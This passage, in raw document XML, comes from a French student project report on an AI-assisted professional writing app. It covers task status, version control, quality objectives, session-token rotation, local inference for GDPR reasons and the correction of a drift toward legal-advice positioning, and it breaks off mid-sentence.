          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CRUD documents et dossiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éditeur Markdown et enregistrement automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Intégration IA et quotas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Back-office administrateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pages légales (mentions, CGU, confidentialité)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scripts SQL de création et de migration MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Livrés ; migration de dev (SQLite) exécutée le 02/10/2026 ; bascule MySQL en attente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correctifs de sécurité (XSS, empreinte du refresh token, configuration, cascades)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminé (§ 8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Journal de veille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminé (§ 11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mise à niveau des dépendances issue de la veille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminée (§ 11) — DOMPurify 3.4.16, Ollama 0.35.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mention de transparence IA (AI Act)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>À faire (§ 11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Plan de tests et jeu d'essai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminé (§ 9, § 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests automatisés (écriture des cas TU et TI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminé — 195 cas au vert, 95 % de couverture backend (§ 9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conteneurisation et pipeline CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminées — Docker Compose (MySQL 8.4, backend, frontend) et pipeline GitHub Actions à trois travaux (§ 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bascule effective SQLite → MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Schéma MySQL exécuté et vérifié sur un serveur réel ; bascule complète en attente d'une machine disposant d'un démon Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Audits accessibilité et sécurité outillés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminés — audit d'accessibilité (axe-core) et audit de sécurité (§ 8, § 9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="X40a503b0cc59f2508bed4ac11a21206d9a9e273"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Environnement humain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Travaillant seule sur la réalisation, j'ai remplacé les rituels d'équipe par deux pratiques : un point d'avancement hebdomadaire avec le référent pédagogique, et des revues de code croisées avec les autres apprenants de la promotion sur les parties sensibles — en premier lieu la chaîne d'authentification.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="X62ad9a35c8acd42e999d1f0adb1c892329592d9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Gestion des versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le code est versionné sur GitHub (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Equinoxya/HelpMeDraft---projet-fil-rouge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Une branche par fonctionnalité, fusionnée dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">après relecture ; messages de commit conventionnés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 pour que l'historique reste lisible. Le fichier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exclut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, les environnements virtuels,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node_modules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et la base SQLite de développement (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) : aucun secret ni donnée de test ne se trouve dans l'historique du dépôt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le fichier de verrouillage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>package-lock.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">commité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ce n'est pas un détail d'organisation mais une mesure de sécurité, dont la compromission de la chaîne d'approvisionnement d'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">axios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 11) a montré l'utilité : c'est lui qui permet de savoir, après coup et avec certitude, quelle version exacte d'une dépendance a été installée.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="X114670d3a61b9f61a74d3b84cdf89614e9bcd94"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Objectifs de qualité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Je me suis fixé six objectifs mesurables en début de projet :</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Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Où il est vérifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucun secret dans le dépôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ignoré,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env.example</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">documenté et à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 6, § 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Séparation stricte des responsabilités</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucun import Flask dans la couche</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">services/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Validation systématique des entrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Types, longueurs et valeurs autorisées contrôlés sur chaque route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucune requête SQL construite par concaténation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requêtes paramétrées par l'ORM, sans exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 7.3, § 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucune donnée utilisateur transmise à un tiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inférence entièrement locale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 5.2, § 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentation exploitable par un tiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">README couvrant installation, variables, API et modèle de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="38" w:name="X888c3fba5dd05560a3140a9aa5ca8e21944a344"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Difficultés rencontrées et arbitrages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sécurisation de la session.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un JWT seul ne permet pas de révoquer une session avant son expiration. J'ai donc ajouté une table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">côté serveur et mis en place une rotation des refresh tokens : chaque usage invalide le token précédent, et la réutilisation d'un token déjà consommé est traitée comme un vol — toutes les sessions de l'utilisateur sont alors révoquées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Quota IA.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le comptage a été implémenté par agrégation sur le journal des appels (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) plutôt que par un compteur stocké sur l'utilisateur : la valeur ne peut pas se désynchroniser, et l'historique reste auditable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confidentialité des contenus.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>L'envoi des textes rédigés à un service tiers était difficilement conciliable avec l'exigence RGPD du cahier des charges. Le passage à une inférence locale a supprimé le problème à la source, au prix de temps de réponse plus longs, d'un prérequis d'installation supplémentaire — et, comme la veille l'a montré (§ 11), d'un service de plus à tenir à jour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dérive du positionnement éditorial, et son recadrage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Au fil des itérations, les textes de l'interface avaient glissé vers un positionnement d'assistant de rédaction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">juridique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: accroche « Assistant de rédaction juridique &amp; administrative », exemple de clause de bail sur la page d'accueil, « Créer mon premier acte », « Accédez à vos dossiers juridiques et modèles d'actes », bibliothèque de modèles centrée sur les baux et les mises en demeure. Le cahier des charges décrit pourtant un tout autre périmètre : des</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">documents professionnels</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">au sens large — courriels, notes, rapports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'écart n'était pas technique mais il était réel : il modifiait la promesse faite à l'utilisateur, engageait implicitement une responsabilité de conseil juridique que les CGU excluent, et rendait incohérent l'ensemble cahier des charges / dossier / application. Une relecture systématique des textes d'interface l'a mis en évidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le recadrage a porté sur vingt libellés répartis dans neuf fichiers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HomeView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">FonctionnalitesView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ModelesView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TarifsView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LoginView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentEditorView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Nav</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Footer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), et sur l'ajout d'une catégorie de modèles « Courriels &amp; Rapports » couvrant explicitement les cas d'usage du cahier des charges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le dernier résidu trouvé est le plus instructif, car il n'était pas dans l'interface mais dans le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">backend</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: les gabarits de prompt de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia_service.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">commençaient par « Tu es un assistant de rédaction juridique et administrative ». Cette phrase n'était affichée nulle part, mais elle était envoyée au modèle à chaque appel — elle orientait donc réellement le style des reformulations produites. Un texte de positionnement peut ainsi avoir un effet fonctionnel, et pas seulement cosmétique, dès lors qu'il alimente un modèle de langage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">J'en retiens une règle de méthode :</w:t>
